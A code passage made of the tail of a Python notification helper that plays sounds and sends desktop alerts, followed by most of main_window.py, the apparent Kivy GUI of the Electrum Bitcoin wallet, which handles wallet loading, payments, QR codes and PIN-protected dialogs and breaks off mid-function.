file_negative = "377017__elmasmalo1__notification-pop.wav"
if success:
snd_file = os.path.join(os.path.dirname(__file__), "sounds", file_positive)
else:
snd_file = os.path.join(os.path.dirname(__file__), "sounds", file_negative)
try:
p = subprocess.Popen(
["ffplay", "-nodisp", "-autoexit", "-hide_banner", snd_file],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
p.wait()
except Exception as e:
print(" * Failed to play sound notification:\n{}".format(e))
@staticmethod
def _notify_display(success, messages):
if success:
title = "SUCCESS"
else:
title = "FAILURE"
try:
p = subprocess.Popen(
["notify-send", title, "\n".join(messages)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
p.wait()
except Exception as e:
print(" * Failed to send notification:\n{}".format(e))
@staticmethod
def _clear_screen():
if os.name == 'nt':
os.system("cls")
else:
# Trying this approach to avoid losing scrollback:
# https://askubuntu.com/a/997893/161463
sys.stdout.write('\33[H\33[2J')
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage
from electrum.wallet import Wallet, InternalAddressCorruption
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum import blockchain
from electrum.network import Network
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# Register a widget cache to keep memory usage down; a timeout of 0 means
# entries are cached forever.
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
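    # Illustrative note (not a test): with base_unit 'mBTC' the decimal point is 5, so
    # get_amount('1.23 mBTC') -> int(10**5 * Decimal('1.23')) == 123000 satoshis, and
    # fiat_to_btc applies the inverse scaling: satoshis = 10**8 * fiat_amount / rate.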
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Tries to ascertain the current orientation the app is displayed in.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
    '''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so as to limit updates to a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, on_qr_failure)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
        Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        ''' Initialize the UX part of Electrum. This function performs the basic
        tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
from electrum.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
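    # Note on get_max_amount() above: the '!' output amount is Electrum's
    # "spend maximum" sentinel, so the unsigned transaction sweeps all spendable
    # coins and the returned value is the balance minus the estimated fees.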
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
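    # Note: passing text == 'texture' is a sentinel: 'icon' is then treated as a
    # Kivy texture and shown full screen with a dimmed background instead of a
    # regular message bubble.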
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except Exception as e:
ok, msg = False, repr(e)
else:
ok, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(ok, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg[:500] if msg else _('There was an error broadcasting the transaction.')
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
